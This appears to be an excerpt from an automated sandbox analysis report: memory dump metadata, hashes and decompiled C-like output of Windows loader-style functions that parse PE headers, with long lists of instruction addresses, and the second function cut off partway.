0x00f420d8
0x00f420da
0x00f420e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 415c5fe6023f65e5d8b9fe298d0ecf5e348d3add40979d2765d22a72a755b225
Instruction ID: 335a1cf3c04610db6225fff6ce6af4b7f104fd4d4d85bb3dbf7ae2514ca28282
Opcode Fuzzy Hash: 415c5fe6023f65e5d8b9fe298d0ecf5e348d3add40979d2765d22a72a755b225
Instruction Fuzzy Hash: C0F10031A087419FEB65DF28C8407AABBE1AF85724F54852DFC959B280D779DC40EB82

Uniqueness

Uniqueness Score: -1.00%

Function 00F2D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00F2D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x100d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00F26600(0x10052d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1007b9c; // 0x0
							_t281 = L00F34620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00F5F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1007b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0x1007b8c; // 0xaa2ad0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00F32280(_t200, 0x10084d8);
									_t277 =  *0x10085f4; // 0xaa2fc0
									_t351 =  *0x10085f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xaa2f58
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00F2FFB0(_t287, _t353, 0x10084d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00F6CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00F26600(0x10052d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00F27926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x100b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00F9E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1008472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x100b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x100b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00F32280(_t250, 0x10084d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00F53898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00F2FFB0(_t293, _t353, 0x10084d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00F537F5(_t353, 0);
																}
																E00F50413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00F49B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00F402D6(_t174);
																}
																L00F377F0( *0x1007b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00F4C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00F2EC7F(_t353);
										L00F419B8(_t287, 0, _t353, 0);
										_t200 = E00F1F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x100b2f8 |  *0x100b2fc) == 0 || ( *0x100b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00F5B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x100b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00FC6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00FC6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00F2E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00F2EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E00F59730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00F2E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00F28F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00F53C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x00f2d5f2
0x00f2d5f5
0x00f2d5f5
0x00f2d5fd
0x00f2d600
0x00f2d60a
0x00f2d60d
0x00f2d617
0x00f2d61d
0x00f2d627
0x00f2d62e
0x00f2d911
0x00f2d913
0x00000000
0x00f2d919
0x00f2d919
0x00f2d919
0x00f2d634
0x00f2d634
0x00f2d634
0x00f2d634
0x00f2d640
0x00f2d8bf
0x00000000
0x00f2d646
0x00f2d646
0x00f2d64d
0x00f2d652
0x00f7b2fc
0x00f7b2fc
0x00f7b302
0x00f7b33b
0x00f7b341
0x00000000
0x00f7b304
0x00f7b304
0x00f7b319
0x00f7b31e
0x00f7b324
0x00f7b326
0x00f7b332
0x00f7b347
0x00f7b34c
0x00f7b351
0x00f7b35a
0x00000000
0x00f7b328
0x00f7b328
0x00000000
0x00f7b328
0x00f7b326
0x00f2d658
0x00f2d658
0x00f2d65b
0x00f2d665
0x00000000
0x00f2d66b
0x00f2d66b
0x00f2d66b
0x00f2d66b
0x00f2d66d
0x00f2d672
0x00f2d67a
0x00000000
0x00000000
0x00f2d680
0x00f2d686
0x00f2d8ce
0x00f2d8d4
0x00f2d8dd
0x00f2d8e0
0x00f2d68c
0x00f2d691
0x00f2d69d
0x00f2d6a2
0x00f2d6a7
0x00f2d6b0
0x00f2d6b5
0x00f2d6e0
0x00f2d6b7
0x00f2d6b7
0x00f2d6b9
0x00f2d6b9
0x00f2d6bb
0x00f2d6bd
0x00f2d6ce
0x00f2d6d0
0x00f2d6d2
0x00f7b363
0x00f7b365
0x00000000
0x00f7b36b
0x00000000
0x00f7b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00f2d6bf
0x00f2d6bf
0x00f2d6e5
0x00f2d6e7
0x00f2d6e9
0x00f2d6ec
0x00f2d6ec
0x00f2d6ef
0x00f2d6f5
0x00f2d6f9
0x00f2d6fb
0x00f2d6fd
0x00f2d701
0x00f2d703
0x00f2d70a
0x00f2d70a
0x00f2d701
0x00f2d710
0x00f2d710
0x00f2d6c1
0x00f2d6c1
0x00f2d6c6
0x00f7b36d
0x00f7b36f
0x00000000
0x00f7b375
0x00f7b375
0x00f7b375
0x00000000
0x00f7b375
0x00000000
0x00f2d6cc
0x00f2d6d8
0x00f2d6d8
0x00f2d6d8
0x00000000
0x00f2d6c6
0x00f2d6bf
0x00000000
0x00f2d6da
0x00f2d6da
0x00f2d716
0x00f2d71b
0x00f2d720
0x00f2d726
0x00f2d726
0x00f2d72d
0x00000000
0x00f2d733
0x00f2d739
0x00f2d742
0x00f2d750
0x00f2d758
0x00f2d764
0x00f2d776
0x00f2d77a
0x00f2d783
0x00f2d928
0x00f2d92c
0x00f2d93d
0x00f2d944
0x00f2d94f
0x00f2d954
0x00f2d956
0x00f2d95f
0x00f2d961
0x00f2d973
0x00f2d973
0x00f2d956
0x00f2d944
0x00f2d92c
0x00f2d78b
0x00f7b394
0x00f2d791
0x00f2d798
0x00f7b3a3
0x00f7b3bb
0x00f7b3bb
0x00f2d7a5
0x00f2d866
0x00f2d870
0x00f2d892
0x00f2d898
0x00f2d89e
0x00f2d8a0
0x00f2d8a6
0x00f2d8ac
0x00f2d8ae
0x00f2d8b4
0x00f2d8b4
0x00f2d8ae
0x00f2d7a5
0x00f2d78b
0x00f2d7b1
0x00f7b3c5
0x00f7b3c5
0x00f2d7c3
0x00f2d7ca
0x00f2d7e5
0x00f2d7eb
0x00f2d8eb
0x00f2d8ed
0x00000000
0x00f2d8f3
0x00f2d8f3
0x00f2d8f3
0x00000000
0x00f2d8ed
0x00f2d7cc
0x00f2d7cc
0x00f2d7d2
0x00000000
0x00f2d7d4
0x00f2d7d4
0x00f2d7d7
0x00f2d7df
0x00f7b3d4
0x00f7b3d9
0x00f7b3dc
0x00f7b3dc
0x00f7b3df
0x00f7b3e2
0x00f7b468
0x00f7b46d
0x00f7b46f
0x00f7b46f
0x00f7b475
0x00f2d8f8
0x00f2d8f9
0x00f2d8fd
0x00f7b3e8
0x00f7b3e8
0x00f7b3eb
0x00f7b3ed
0x00000000
0x00f7b3ef
0x00f7b3ef
0x00f7b3f1
0x00f7b3f4
0x00f7b3fe
0x00f7b404
0x00f7b409
0x00f7b40e
0x00f7b410
0x00f7b410
0x00f7b414
0x00f7b414
0x00f7b41b
0x00f7b420
0x00f7b423
0x00f7b425
0x00f7b427
0x00f7b42a
0x00f7b42d
0x00f7b42d
0x00f7b42a
0x00f7b432
0x00f7b436
0x00f7b438
0x00f7b43b
0x00f7b43b
0x00f7b449
0x00f7b44e
0x00f7b454
0x00f7b458
0x00f7b458
0x00f7b45d
0x00000000
0x00f7b45d
0x00f7b3ed
0x00000000
0x00000000
0x00000000
0x00f2d7df
0x00f2d7d2
0x00f2d7ca
0x00f7b37c
0x00f7b37e
0x00f7b385
0x00f7b38a
0x00000000
0x00f7b38a
0x00f2d742
0x00f2d7f1
0x00f2d7f8
0x00f7b49b
0x00f7b49b
0x00f2d800
0x00f2d837
0x00f2d843
0x00f2d845
0x00f2d847
0x00f2d84a
0x00f2d84b
0x00f2d84e
0x00f2d857
0x00f2d818
0x00f2d824
0x00f2d831
0x00f7b4a5
0x00f7b4ab
0x00f7b4b3
0x00f7b4b8
0x00f7b4bb
0x00000000
0x00f7b4c1
0x00f7b4c1
0x00f7b4c8
0x00000000
0x00f7b4ce
0x00f7b4d4
0x00f7b4e1
0x00f7b4e3
0x00f7b4e5
0x00000000
0x00f7b4eb
0x00f7b4f0
0x00f7b4f2
0x00f2dac9
0x00f2dacc
0x00f2dacf
0x00f2dad1
0x00f2dd78
0x00f2dd78
0x00f2dcf2
0x00000000
0x00f2dad7
0x00f2dad9
0x00f2dadb
0x00000000
0x00000000
0x00f2dae1
0x00f2dae1
0x00f2dae4
0x00f2dae6
0x00f7b4f9
0x00f7b4f9
0x00f7b500
0x00f2daec
0x00f2daec
0x00f2daf5
0x00f2daf8
0x00f2dafb
0x00f2db03
0x00f2db11
0x00f2db16
0x00f2db19
0x00f2db1b
0x00f7b52c
0x00f7b531
0x00f7b534
0x00f2db21
0x00f2db21
0x00f2db24
0x00f2dcd9
0x00f2dce2
0x00f2dce5
0x00f2dd6a
0x00f2dd6d
0x00000000
0x00f2dd73
0x00f7b51a
0x00f7b51c
0x00f7b51f
0x00f7b524
0x00000000
0x00f7b524
0x00f2dce7
0x00f2dce7
0x00f2dce7
0x00000000
0x00f2dce7
0x00000000
0x00f2db2a
0x00f2db2c
0x00f2db31
0x00f2db33
0x00f2db36
0x00f2db39
0x00f2db3b
0x00f2db66
0x00f2db66
0x00f2db3d
0x00f2db3d
0x00f2db3e
0x00f2db46
0x00f2db47
0x00f2db49
0x00f2db4c
0x00f2db53
0x00f2db55
0x00f2db58
0x00f2db5a
0x00f7b50a
0x00f7b50f
0x00f7b512
0x00f2db60
0x00f2db60
0x00f2db63
0x00f2db63
0x00000000
0x00f2db63
0x00f2db5a
0x00f2db3b
0x00f2db24
0x00f2db69
0x00f2db69
0x00f2db6c
0x00f2db6f
0x00f2db74
0x00f7b557
0x00f7b557
0x00f7b55e
0x00f2db7a
0x00f2db7c
0x00f2db7f
0x00f2db82
0x00f2db85
0x00000000
0x00f2db8b
0x00f2db8b
0x00f2db8d
0x00f2db9b
0x00f2db9b
0x00f2db9d
0x00f2dba0
0x00f2dba2
0x00f2dba4
0x00f2dba7
0x00f2dba9
0x00f2dbae
0x00f2dbae
0x00f2dbb1
0x00f2dbb4
0x00f2dbb4
0x00f2dbb7
0x00f2dbba
0x00f2dcd2
0x00f2dcd4
0x00000000
0x00f2dbc0
0x00f2dbc0
0x00f2dbd2
0x00f2dbd7
0x00f2dbda
0x00f2dbdd
0x00f2dbdf
0x00000000
0x00f2dbe5
0x00f2dbe5
0x00f2dbee
0x00f2dbf1
0x00f7b541
0x00f7b544
0x00000000
0x00f7b546
0x00f7b546
0x00000000
0x00f7b546
0x00f2dbf7
0x00f2dbf7
0x00f2dbfd
0x00f2dbfd
0x00f2dbff
0x00f2dc0b
0x00f2dc15
0x00f2dc1b
0x00f2dc1d
0x00f2dc21
0x00f2dc21
0x00f2dc23
0x00f2dc23
0x00f2dc26
0x00f2dc29
0x00f2dc2b
0x00000000
0x00000000
0x00f2dc31
0x00f2dc34
0x00f2dc36
0x00f2dcbf
0x00f2dcbf
0x00f2dcc2
0x00000000
0x00f2dc3c
0x00f2dc41
0x00f2dc43
0x00000000
0x00f2dc45
0x00f2dc45
0x00f2dc47
0x00000000
0x00f2dc4d
0x00f2dc4d
0x00f2dc50
0x00f2dc52
0x00f2dc55
0x00f2dcfa
0x00f2dcfe
0x00f2dd08
0x00f2dd0a
0x00f2dd0c
0x00000000
0x00f2dd12
0x00f2dd15
0x00f2dd2d
0x00f2dd2f
0x00f2dd32
0x00f2dd35
0x00000000
0x00f2dd35
0x00f2dc5b
0x00f2dc5b
0x00f2dc5e
0x00f2dc61
0x00f2dc64
0x00f2dc67
0x00f2dc67
0x00f2dc6a
0x00f2dc6c
0x00f2dc8e
0x00f2dc8e
0x00f2dc91
0x00f2dc93
0x00f2dcce
0x00f2dcce
0x00f2dc95
0x00f2dc9c
0x00f2dc6e
0x00f2dc72
0x00f2dc75
0x00f2dc77
0x00f2dc79
0x00f7b551
0x00f7b551
0x00000000
0x00f2dc7f
0x00f2dc7f
0x00f2dc81
0x00000000
0x00f2dc83
0x00f2dc86
0x00f2dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00f2dc88
0x00f2dc81
0x00f2dc79
0x00f2dc6c
0x00f2dc55
0x00f2dc47
0x00f2dc43
0x00000000
0x00f2dc36
0x00f2dc23
0x00000000
0x00f2dbff
0x00f2dbf1
0x00f2dbdf
0x00f2db8f
0x00f2db92
0x00f2db95
0x00000000
0x00000000
0x00000000
0x00000000
0x00f2db95
0x00f2db8d
0x00f2db85
0x00f2db74
0x00f2dc9f
0x00f2dca2
0x00f2dcb0
0x00f2dcb0
0x00f2dad1
0x00f7b4e5
0x00f7b4c8
0x00000000
0x00000000
0x00000000
0x00f2d831
0x00000000
0x00f2d800
0x00f7b47f
0x00f7b485
0x00000000
0x00f7b485
0x00f2d665
0x00f2d652
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da086e13579e50dd5006304aa6705a7b61cb12ddfa49f76c221295480e1630e6
Instruction ID: 54f23e9b88f516ffcb0ca8f105d68e73b4d89e0d8f74cd15aabb2a6eafec3eb4
Opcode Fuzzy Hash: da086e13579e50dd5006304aa6705a7b61cb12ddfa49f76c221295480e1630e6
Instruction Fuzzy Hash: 70E1D331E00369CFDB35CF14DC84BA9B7B1BF46324F1441AAE9499B291D738AD81EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F2849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00F2849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0xfef9c0);
				E00F6D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1007b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E00F2CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E00F32280( *[fs:0x30], 0x1008550);
						_t139 =  *0x1007b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
